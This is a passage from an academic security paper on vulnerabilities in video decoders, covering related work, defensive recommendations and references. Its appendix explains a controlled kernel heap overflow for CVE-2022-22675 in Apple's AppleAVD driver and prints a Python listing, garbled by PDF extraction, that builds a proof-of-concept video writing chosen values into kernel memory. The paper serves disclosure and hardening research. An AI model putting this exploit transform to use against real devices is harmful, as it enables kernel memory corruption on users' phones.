output image. Even tools for debugging video files, such as been used with great success to improve the quality of other
Elecard’s StreamEye,25 are used to visually inspect videos to kinds of media-parsing libraries, but that success has evidently
adjust a video encoder rather than edit syntax elements. not translated to video decoding.
Several exploitable vulnerabilities in video decoders have The bugs we found and described in Section 5 have been
previously been demonstrated. Gong and Pi [16] describe present in iOS for a long time. We have tested that our proof-
an exploitable vulnerability in the Venus firmware found in of-concept videos induce kernel panics on devices running
Qualcomm Snapdragon SoCs. Donenfeld [13] found a ker- iOS 13.3 (released December 2019) and iOS 15.6 (released
nel overwrite vulnerability in the AppleD5500.kext for iOS July 2022). Binary analysis suggests that the first bug we
10. Tarakanov and Labunets [45] found an out-of-bounds identified was present in the kernel as far back as iOS 10, the
write vulnerability in AppleAVD.kext and discuss its inter- first release whose kernel binary was distributed unencrypted.
nals. They also discuss CVE-2022-22675, but do not provide We make H26F ORGE available at https://github.com/
details on how to extend the initial overflow. h26forge/h26forge under an open source license. We hope
Format-aware fuzzers such as QuickFuzz [17] and its that it will facilitate followup work, both by academic re-
derivatives [37, 44] can generate test inputs based on a gram- searchers and by the vendors themselves, to improve the
mar, but they cannot produce the entropy-encoded values software quality of video decoders.
needed for H.264. For example, FormatFuzzer [15] opts Second, the video decoder ecosystem is more insecure than
23 Online:
previously realized. Platform vendors should urgently con-
https://www.ffmpeg.org/.
24 Online:
https://vcgit.hhi.fraunhofer.de/jvet/JM. 26 Online: https://www.synopsys.com/software-integrity/
25 Online: https://www.elecard.com/products/video-analysis/ security-testing/fuzz-testing/defensics/protocols/h264-
streameye. file.html.
sider designs that deprivilege software and hardware compo- [5] “About the security content of iOS 16.2 and iPadOS 16.2.” Online:
nents that process untrusted video input. https://support.apple.com/en-us/HT213530. Dec. 2022.
Browser vendors have worked to sandbox media decoding [6] Apple Platform Security. Online: https://help.apple.com/pdf/
libraries (see, e.g., Narayan et al. [34]); so have messaging security/en_US/apple-platform-security-guide.pdf. Dec.
2022.
app vendors, with the iMessage BlastDoor process being a
[7] Brandon Azad. “An iOS hacker tries Android.” Online: https://
notable example [18]. Mobile OS vendors have also worked
googleprojectzero.blogspot.com/2020/12/an-ios-hacker-
to sandbox system media servers.27 These efforts are under- tries-android.html. Dec. 2020.
mined by parsing video formats in kernel drivers. [8] Ian Beer. “An iOS zero-click radio proximity exploit odyssey.” On-
Our reading of reverse-engineered kernel drivers suggests line: https://googleprojectzero.blogspot.com/2020/12/
that current hardware relies on software to parse parameter an-ios-zero-click-radio-proximity.html. Dec. 2020.
sets and populate a context structure used by the hardware in [9] Gal Beniamini. “Over The Air: Exploiting Broadcom’s Wi-Fi Stack
macroblock decoding. It is not clear that it is safe to invoke (Part 1).” Online: https://googleprojectzero.blogspot.com/
2017/04/over- air- exploiting- broadcoms- wi- fi_4.html.
hardware decoding with a maliciously constructed context Apr. 2017.
structure, which suggests that whatever software component
[10] Mark Brand. “Stagefrightened?” Online: https://googleprojec
is charged with parsing parameter sets and populating the tzero.blogspot.com/2015/09/stagefrightened.html. Sept.
hardware context will need to be trusted, whether it is in the 2015.
kernel or not. It may be worthwhile to rewrite this software [11] “CERT Vulnerability Note VU#924951.” Online: https://www.kb.
component in a memory-safe language, such as the cros- cert.org/vuls/id/924951. July 2015.
codecs 28 effort, or to apply formal verification techniques to [12] Jiska Classen, Francesco Gringoli, Michael Hermann, and Matthias
it. Hollick. “Attacks on Wireless Coexistence: Exploiting Cross-
An orthogonal direction for progress, albeit one that will Technology Performance Features for Inter-Chip Privilege Escalation.”
In: Proceedings of IEEE Security and Privacy (“Oakland”) 2022
require the support of media IP vendors, would redesign the (May 2022), pp. 1229–45.
software–hardware interface to simplify it. The Linux push
[13] Adam Donenfeld. “Viewer Discretion Advised: (De)coding an iOS
for stateless hardware video decoders [14] is a step in this Kernel Vulnerability.” In: Phrack 70 (Oct. 2021). Online: http:
direction. Similarly, encoders that produce outputs that are //phrack.org/issues/70/8.html.
software-decoder friendly, such as some AV1 encoders [27], [14] Nicolas Dufresne. “Linux Stateless Video Decoder Support.” Pre-
help reduce the expected complexity of video decoders. sented at ELC 2020. Slides online: https://elinux.org/images/
c/c7/2020-06_ELCNA_-_Nicolas_Dufresne.pdf. July 2020.
[15] Rafael Dutra, Rahul Gopinath, and Andreas Zeller. “Format-
Acknowledgements Fuzzer: Effective Fuzzing of Binary File Formats.” arXiv preprint
arXiv:2109.11277. Online: https : / / arxiv . org / abs / 2109 .
We would first like to acknowledge Øystein Sigholt and 11277. Sept. 2021.
Jiaming Hu, whose 2018 CSE 227 browser fingerprinting [16] Xiling Gong and Peter Pi. “Bypassing the Maginot Line: Remotely
project was the first to encounter the Luma Chroma Thief Exploit the Hardware Decoder on Smartphone.” Presented at Black
Hat 2019. Slides online: https://i.blackhat.com/USA- 19/
effect and inspired the tooling effort described in this paper. Wednesday/us-19-Gong-Bypassing-The-Maginot-Line-Remo
We would also like to thank Alex Gantman, David Kohlbren- tely- Exploit- The- Hardware- Decoder- On- Smartphone.pdf.
ner, and Stefan Savage for conversations about this work, and Aug. 2019.
Hang Zhang and Zhiyun Qian for discussing their ION alloca- [17] Gustavo Grieco, Martín Ceresa, Agustín Mista, and Pablo Buiras.
tor work with us. This work was partly supported by a grant “QuickFuzz testing for fun and profit.” In: Journal of Systems and
from Cisco and a research gift from Qualcomm. Software 134 (Dec. 2017), pp. 340–54.
[18] Samuel Groß. “A Look at iMessage in iOS 14.” Online: https :
//googleprojectzero.blogspot.com/2021/01/a- look- at-
References imessage-in-ios-14.html. Jan. 2021.
[19] Ben Hawkes. “Attacking the Qualcomm Adreno GPU.” Online: http
[1] Paul Adenot and Bernard Aboba. WebCodecs. Working Draft. Online: s://googleprojectzero.blogspot.com/2020/09/attacking-
https://www.w3.org/TR/webcodecs/. W3C, Feb. 2023. qualcomm-adreno-gpu.html. Sept. 2020.
[2] “About the security content of iOS 16.1 and iPadOS 16.” Online: [20] Grant Hernandez, Marius Muench, Dominik Maier, Alyssa Milburn,
https://support.apple.com/en-us/HT213489. Oct. 2022. Shinjo Park, Tobias Scharnowski, Tyler Tucker, Patrick Traynor, and
[3] “About the security content of iOS 15.7.1 and iPadOS 15.7.1.” Online: Kevin R. B. Butler. “FirmWire: Transparent Dynamic Analysis for
https://support.apple.com/en-us/HT213490. Oct. 2022. Cellular Baseband Firmware.” In: Proceedings of NDSS 2022. Feb.
2022.
[4] “About the security content of iOS 15.7.2 and iPadOS 15.7.2.” Online:
https://support.apple.com/en-us/HT213531. Dec. 2022. [21] Imagination Technologies. “Metagence Multi-threaded Processor IP
Cores.” Archived: https://web.archive.org/web/2006081315
27 See, e.g., https://source.android.com/docs/core/media/ 2939/http://www.imgtec.com/metagence/products/. 2006.
framework-hardening. [22] Kyriakos Ispoglou, Daniel Austin, Vishwath Mohan, and Mathias
28 Online: https://chromium.googlesource.com/crosvm/crosvm/
Payer. “FuzzGen: Automatic Fuzzer Generation.” In: Proceedings of
+/refs/heads/main/media/cros-codecs/. USENIX Security 2020. Aug. 2020, pp. 2271–87.
[23] H.264: Advanced video coding for generic audiovisual services. Stan- [41] Iain E. Richardson. The H.264 Advanced Video Compression Stan-
dard. Online: https : / / www . itu . int / rec / T - REC - H . 264 - dard. second. Wiley, 2010.
202108-I/en. ITU-T, Aug. 2021. [42] Ton Roosendaal. “Big Buck Bunny.” In: ACM SIGGRAPH ASIA
[24] Conformance specification for ITU-T H.264 advanced video coding. 2008 Computer Animation Festival. Dec. 2008, p. 62.
Standard. Online: https://www.itu.int/rec/T-REC-H.264.1- [43] Natalie Silvanovich. “CVE-2022-22675: AppleAVD Overflow in
201602-I/en. ITU-T, Aug. 2021. AVC_RBSP::parseHRD.” Online: https://googleprojectzero.
[25] Pierre Laperdrix, Nataliia Bielova, Benoit Baudry, and Gildas Avoine. github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-
“Browser Fingerprinting: A Survey.” In: ACM Transactions on the 22675.html. May 2022.
Web 14.2 (Apr. 2020). [44] Prashast Srivastava and Mathias Payer. “Gramatron: Effective
[26] Kevin Lee, Vijay Rao, and William Arnold. “Accelerating Facebook’s Grammar-Aware Fuzzing.” In: Proceedings of ISSTA 2021. July
infrastructure with application-specific hardware.” Online: https: 2021, pp. 244–56.
//engineering.fb.com/2019/03/14/data-center-engineeri [45] Nikita Tarakanov and Andrey Labunets. “Cinema time!” Presented
ng/accelerating-infrastructure/. Mar. 2019. at Hexacon 2022. Slides online: https://github.com/isciurus/
[27] Ryan Lei, Haixia Shi, Haoteng Chen, Ali Monfared, and Cheng Shi. hexacon2022_AppleAVD/blob/main/hexacon2022_AppleAVD.
“How Meta brought AV1 to Reels.” Online: https://engineer pdf. Oct. 2022.
ing.fb.com/2023/02/21/video- engineering/av1- codec-
[46] David Wang, Mathew Solnik, and Tarjei Mandt. “Demystifying the
facebook-instagram-reels/. Feb. 2023.
Secure Enclave Processor.” Presented at Black Hat 2016. Slides
[28] Slava Makkaveev. “Looking for vulnerabilities in MediaTek audio online: https://www.blackhat.com/docs/us-16/materials/u
DSP.” Online: https://research.checkpoint.com/2021/loo s-16-Mandt-Demystifying-The-Secure-Enclave-Processor.
king-for-vulnerabilities-in-mediatek-audio-dsp/. Nov. pdf. Aug. 2016.
2021.
[47] Hang Zhang, Dongdong She, and Zhiyun Qian. “Android ION Haz-
[29] Slava Makkaveev. “Pwn2Own Qualcomm DSP.” Online: https: ard: The Curse of Customizable Memory Management System.” In:
//research.checkpoint.com/2021/pwn2own- qualcomm- dsp/. Proceedings of the 2016 ACM SIGSAC Conference on Computer and
May 2021. Communications Security. 2016, pp. 1663–1674.
[30] Detlev Marpe, Thomas Wiegand, and Stephen Gordon. “H.264/
MPEG4-AVC Fidelity Range Extensions: Tools, Profiles, Perfor-
mance, and Application Areas.” In: Proceedings of ICIP 2005, Vol- A More details on CVE-2022-22675
ume I. Sept. 2005, pp. 593–96.
[31] Damiano Melotti, Maxime Rossi-Bellom, and Andrea Continella. This section provides more details on how we controlled the
“Reversing and Fuzzing the Google Titan M Chip.” In: Proceedings second overflow in our proof-of-concept video for CVE-2022-
of ROOTS 2021. Nov. 2021, pp. 1–10. 22675. Listing 2 shows the final transform.
[32] Man Yue Mo. “Fall of the Machines: Exploiting the Qualcomm We enable a second overflow in parsePredWeightTable
NPU (Neural Processing Unit) Kernel Driver.” Online: https://
by overwriting num_ref_idx_l0_active_minus1 with
securitylab . github . com / research / qualcomm _ npu/. Nov.
2021. CVE-2022-22675. The function parsePredWeightTable
[33] “Mozilla Foundation Security Advisory 2022-40.” Online: https: loops from 0 to num_ref_idx_l0_active_minus1, check-
//www.mozilla.org/en-US/security/advisories/mfsa2022- ing a luma or chroma flag at each instance to determine
40/. Sept. 2022. whether to parse the syntax elements luma_weight, luma_
[34] Shravan Narayan, Craig Disselkoen, Tal Garfinkel, Nathan Froyd, offset, chroma_weight, and chroma_offset when the re-
Eric Rahm, Sorin Lerner, Hovav Shacham, and Deian Stefan. spective flag is set. The H.264 User Context maintains eight
“Retrofitting Fine Grain Isolation in the Firefox Renderer.” In: Pro-
ceedings of USENIX Security 2020. Aug. 2020, pp. 699–716.
lists of type uint16: for both reference lists, it has arrays
of length 16 for luma_weight and luma_offset, and arrays
[35] Hikaru Nishida, Suleiman Souhlal, and Sangwhan Moon. “Making
Android Runtime on Chrome OS More Secure and Easier to Upgrade of length 32 for chroma_weight and chroma_offset. For
with ARCVM.” Online: https : / / chromeos . dev / en / posts / each syntax element, AppleAVD.kext will exp-Golomb de-
making-android-more-secure-with-arcvm. Mar. 2022. code it, store the recovered value in the H.264 User Context,
[36] Lena E. Olson, Simha Sethumadhavan, and Mark D. Hill. “Secu- and then check to see if it is in the range [0,255].
rity Implications of Third-Party Accelerators.” In: IEEE Computer We found that in parsePredWeightTable, the overwritten
Architecture Letters 15.1 (Jan. 2016), pp. 50–53.
8-bit num_ref_idx_l0_active_minus1 is sign-extended to
[37] Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis,
and Yves Le Traon. “Semantic Fuzzing with Zest.” In: Proceedings
32-bits. This means that setting it to a value larger than 127
of ISSTA 2019. July 2019, pp. 329–40. leads to a uint32 loop bound of at least 4,294,967,040! If
[38] Gwendal Patat, Mohamed Sabt, and Pierre-Alain Fouque. “Exploring the encoded bitstream is exhausted without failure, then the
Widevine for Fun and Profit.” In: Proceedings of WOOT 2022. May bitstream reader will return a bit string of all 1s which exp-
2022, pp. 277–88. Golomb decode to 0. This is within the bounds for each syntax
[39] Maxime Peterlin. “Reversing and Exploiting Samsung’s Neural Pro- element, and thus the loop will continue until the entire kernel
cessing Unit.” Online: https : / / blog . impalabs . com / 2103 _ heap is overflowed, triggering a kernel panic. Alternatively,
reversing-samsung-npu.html. Mar. 2021.
if the decoder encounters a luma/chroma weight or offset
[40] Parthasarathy Ranganathan, Daniel Stodolsky, Jeff Calow, Jeremy
outside the expected bounds, it first stores the out-of-bounds
Dorfman, Marisabel Guevara, Clinton Wills Smullen IV, et al.
“Warehouse-Scale Video Acceleration: Co-Design and Deployment in weight or offset as normal and then it exits the loop, emits an
the Wild.” In: Proceedings of ASPLOS 2021. Apr. 2021, pp. 600–15. error message, and continues to the next NALU.
Therefore, to escape the 32-bit sign extended loop, we 42 p p s _ t g t _ p a y l o a d 0 = n u m _ r e f _ i d x _ p a y l o a d << 16 # b o t t o m b y t e i s
num_ref_idx_l0_default_active_minus1
encode a weight or offset element Bn in the range [256, 43 p p s _ t g t _ p a y l o a d 0 | = n u m _ r e f _ i d x _ p a y l o a d << 8 # t o p b y t e i s
num_ref_idx_l1_default_active_minus1
65535] at the point we would like to target. To do so, we 44 p p s _ t g t _ p a y l o a d 0 | = i n t ( d s [ " p p s e s " ] [ 0 ] [ " w e i g h t e d _ p r e d _ f l a g " ] ) << 24 # v a l u e
i s a byte
need to enable the luma and chroma flags and fill in the cor- 45 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
cpb_size_values_minus1 " ][ ref_idx_overwrite_idx ] = pps_tgt_payload0
responding luma_weight, luma_offset, chroma_weight, 46
47 # ####
and chroma_offset entries. The flags are decoded and 48 # Step 2. Prepare f o r our second o v e r w r i t e in p r e d _ w e i g h t _ t a b l e decoding
49 # ####
checked on each loop, so we include an encoding of the flags 50
51 # S e t a l l s l i c e s t o IDR s l i c e s t o a v o i d " m i s s i n g Keyframe " e r r o r
in the generated bitstream. When the flags are set to true, we 52 f o r i i n range ( l e n ( ds [ " n a l u _ h e a d e r s " ] ) ) :
53 i f d s [ " n a l u _ h e a d e r s " ] [ i ] [ " n a l _ u n i t _ t y p e " ] == 1 :
can write values in the range [0, 255] without exiting early. 54 ds [ " n a l u _ h e a d e r s " ] [ i ] [ " n a l _ u n i t _ t y p e " ] = 5
55
When they are set to false, AppleAVD.kext writes a default 56 p r i n t ( " \ t Need {} P s l i c e s t o w r i t e t h e m e s s a g e 0x {} " . f o r m a t ( l e n (
m e s s a g e _ s n i p p e t s ) , message_hex ) )
value at those locations. Either way, intermediate memory up 57
58 n a l u _ i d x = 4 # Our v i d e o i s SPS , PPS , SPS , I , P s o we copy i n d e x 4
to our target is modified. Because the flags must be checked 59 s l i c e _ i d x = 1 # We want t h e P s l i c e t o be c o p i e d
60 w h i l e l e n ( d s [ " s l i c e s " ] ) <= l e n ( m e s s a g e _ s n i p p e t s ) :
on each loop, the slice header size is proportional to the target 61 d s = c l o n e _ a n d _ a p p e n d _ e x i s t i n g _ s l i c e ( ds , n a l u _ i d x , s l i c e _ i d x )
62
offset. In all, writing an arbitrary sequence of 16-bit values to 63 # ####
64 # S t e p 3 . Modify r e l e v a n t s l i c e s t o w r i t e o u r t a r g e t m e s s a g e
memory requires n slices for n larger-than-255 values, with 65 # ####
66 f o r i i n range ( 1 , l e n ( ds [ " s l i c e s " ] ) ) :
smaller values written by enabling intermediate flags. 67 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " n u m _ r e f _ i d x _ a c t i v e _ o v e r r i d e _ f l a g " ] = F a l s e
68 a v c u s e r c o n t e x t _ o f f s e t = o f f s e t # This w i l l w r i t e r i g h t next to our
When using multiple slices for multiple writes, each previous write
69 o f f s e t _ f r o m _ s l i c e = a v c u s e r c o n t e x t _ o f f s e t − 0 x374d4 # t h i s c o n s t a n t i s
slice must be within an IDR NALU, as the out-of-bounds the s t a r t of the S l i c e o f f s e t
70 c h r o m a _ o f f s e t _ o v e r w r i t e _ n u m = ( o f f s e t _ f r o m _ s l i c e − 0 x206 ) / 4 # 0 x206 i s
luma/chroma offset/weight is treated as a decoding error, and t h e o f f s e t from t h e s t a r t o f t h e s l i c e ;
71 s l i c e _ n u m _ r e f _ i d x _ p a y l o a d = c h r o m a _ o f f s e t _ o v e r w r i t e _ n u m + (1 − i ) / 2 + i n t (
the decoder uses IDR NALUs for recovery. We adjust the math . c e i l ( l e n ( m e s s a g e _ h e x ) / 8 . 0 ) )
72
slices using the same technique we used for the infinite loop 73 # I f we h a v e an odd number o f ' s h o r t ' t y p e s we want t o w r i t e ,
74 # and i f we ' r e w r i t i n g t h e l o w e r end o f b y t e s , we n e e d t o
bug discussed in Section 5.1. 75 # s l i g h t l y r e c a l i b r a t e where we w r i t e
76 i f l e n ( d s [ " s l i c e s " ] ) % 2 == 0 and i % 2 == 0 :
77 s l i c e _ n u m _ r e f _ i d x _ p a y l o a d −= 1
Listing 2: CVE-2022-22675 video transform. 78 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " n u m _ r e f _ i d x _ l 0 _ a c t i v e _ m i n u s 1 " ] =
slice_num_ref_idx_payload
79 d s [ " s l i c e s " ] [ i ] [ " s h " ] [ " l u m a _ l o g 2 _ w e i g h t _ d e n o m " ] = 0 # 1 << X i s s t o r e d
1 d e f c ve _ 2 0 22 _ 2 2 67 5 ( ds , m e s s a g e ) :
80 d s [ " s l i c e s " ] [ i ] [ " s h " ] [ " c h r o m a _ l o g 2 _ w e i g h t _ d e n o m " ] = 0 # 1 << X i s s t o r e d
2 from h e l p e r s i m p o r t n e w _ v u i _ p a r a m e t e r , n e w _ h r d _ p a r a m e t e r ,
81 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " l u m a _ w e i g h t _ l 0 _ f l a g " ] = [ F a l s e ] * (
clone_and_append_existing_slice
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
3 i m p o r t math
82
4
83 # on t h e d e v i c e , t h i s i s s h i f t e d by t h e s p s . b i t _ d e p t h _ l u m a _ v a l u e _ m i n u s 8
5 # T h i s i s t h e o f f s e t from t h e s t a r t o f t h e c o n t e x t
84 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " luma_weight_l0 " ] = [ 0 ] * (
6 # − O b j e c t s i z e i s 0 x8642b0
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
7 # − A l l o c a t e d s i z e i s 0 x868000
85 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " l u m a _ o f f s e t _ l 0 " ] = [ 0 ] * (
8 o f f s e t = 0 x868000
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
9 # Keep t h i s e v e n w i t h no s h o r t i n t h e r a n g e [ 0 x0000 , 0 x 0 0 7 f ]
86 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ w e i g h t _ l 0 _ f l a g " ] = [ F a l s e ] * (
10 message_hex = " deadbeef41414141 "
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
11
87
12 m e s s a g e _ s n i p p e t s = [ i n t ( message_hex [ i : i +4] , 16) f o r i i n range ( 0 , l e n (
88 # on t h e d e v i c e , t h i s i s s h i f t e d by t h e s p s . b i t _ d e p t h _ c h r o m a _ v a l u e _ m i n u s 8
message_hex ) , 4) ] [ : : − 1 ]
89 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " chroma_weight_l0 " ] = [ [ 0 , 0 ] ] * (
13
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
14 p r i n t ( " \ t W r i t i n g ' 0 x { } ' a t f u r t h e s t o f f s e t l o c a t i o n 0x { : x } " . f o r m a t (
90 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] = [ [ 0 , 0 ] ] * (
message_hex , o f f s e t ) )
s l i c e _ n u m _ r e f _ i d x _ p a y l o a d +1)
15
91
16 # ####
92 # The l o c a t i o n we ' r e o v e r w r i t i n g
17 # S t e p 1 . Use parseHRD o v e r w r i t e t o c h a n g e t h e d e f a u l t n u m _ r e f _ i d x v a l u e
93 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ w e i g h t _ l 0 _ f l a g " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
18 # ####
= True
19
94 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " chroma_weight_l0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ] = [0
20 # We n e e d t h i s f l a g e n a b l e d t o go i n t o s e c o n d o v e r w r i t e
x64+ i , 0 x65+ i ]
21 ds [ " ppses " ] [ 0 ] [ " w e i g h t e d _ p r e d _ f l a g " ] = True
95
22
96 # Our t a r g e t o v e r w r i t e l o c a t i o n
23 # P r e p a r e o u r o v e r w r i t i n g SPS
97 i f l e n ( d s [ " s l i c e s " ] ) % 2 == 1 : # We a r e w r i t i n g an e v e n number o f s h o r t s
24 s p s _ i d x = 1 # We t a r g e t t h e 2 nd SPS
98 i f i % 2 == 1 :
25 c p b _ c n t _ m i n u s 1 = 68 # T h i s v a l u e i s l i m i t e d t o 2 5 5 ; we s e t i t t o 68 f o r
99 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
targeting
= [ m e s s a g e _ s n i p p e t s [ i ] , 0 x20 ]
26 r e f _ i d x _ o v e r w r i t e _ i d x = 68 # F i r s t i n d e x where we o v e r w r i t e t h e
100 else :
num_ref_idx_l0_default_active_minus1
101 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
27 num_ref_idx_payload = 0 xff
= [ 0 x21 , m e s s a g e _ s n i p p e t s [ i − 2 ] ]
28
102 e l s e : # odd number o f s h o r t v a l u e s
29 d s [ " s p s e s " ] [ s p s _ i d x ] [ " s e q _ p a r a m e t e r _ s e t _ i d " ] = 31
103 i f i % 2 == 0 :
30 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s _ p r e s e n t _ f l a g " ] = True
104 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
31 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] = new_vui_parameter ( )
= [ 0 x20 , m e s s a g e _ s n i p p e t s [ i − 1 ] ]
32
105 else :
33 # To maximize o u r o v e r w r i t e , we f o c u s on VCL HRD p a r a m e t e r s , g i v e n i t i s
106 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
c l o s e s t t o t h e end o f t h e o b j e c t
= [ m e s s a g e _ s n i p p e t s [ i − 1 ] , 0 x21 ]
34 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s _ p r e s e n t _ f l a g " ] =
107 r e t u r n ds
True
35 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] =
new_hrd_parameter ( )
36 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
cpb_cnt_minus1 " ] = cpb_cnt_minus1
37 # F i l l up w i t h j u n k and we w i l l w r i t e o v e r what v a l u e s m a t t e r
38 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
b i t _ r a t e _ v a l u e _ m i n u s 1 " ] = [ i f o r i i n range ( cpb_cnt_minus1 +1) ]
39 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
c p b _ s i z e _ v a l u e s _ m i n u s 1 " ] = [ i + c p b _ c n t _ m i n u s 1 +1 f o r i i n r a n g e (
c p b _ c n t _ m i n u s 1 +1 ) ]
40 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ " c b r _ f l a g " ] =
[ F a l s e ] * ( cpb_cnt_minus1 +1)
41 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ " c b r _ f l a g " ] [
r e f _ i d x _ o v e r w r i t e _ i d x − 5 ] = T r u e # PPS E n t r o p y e n c o d i n g

You might also like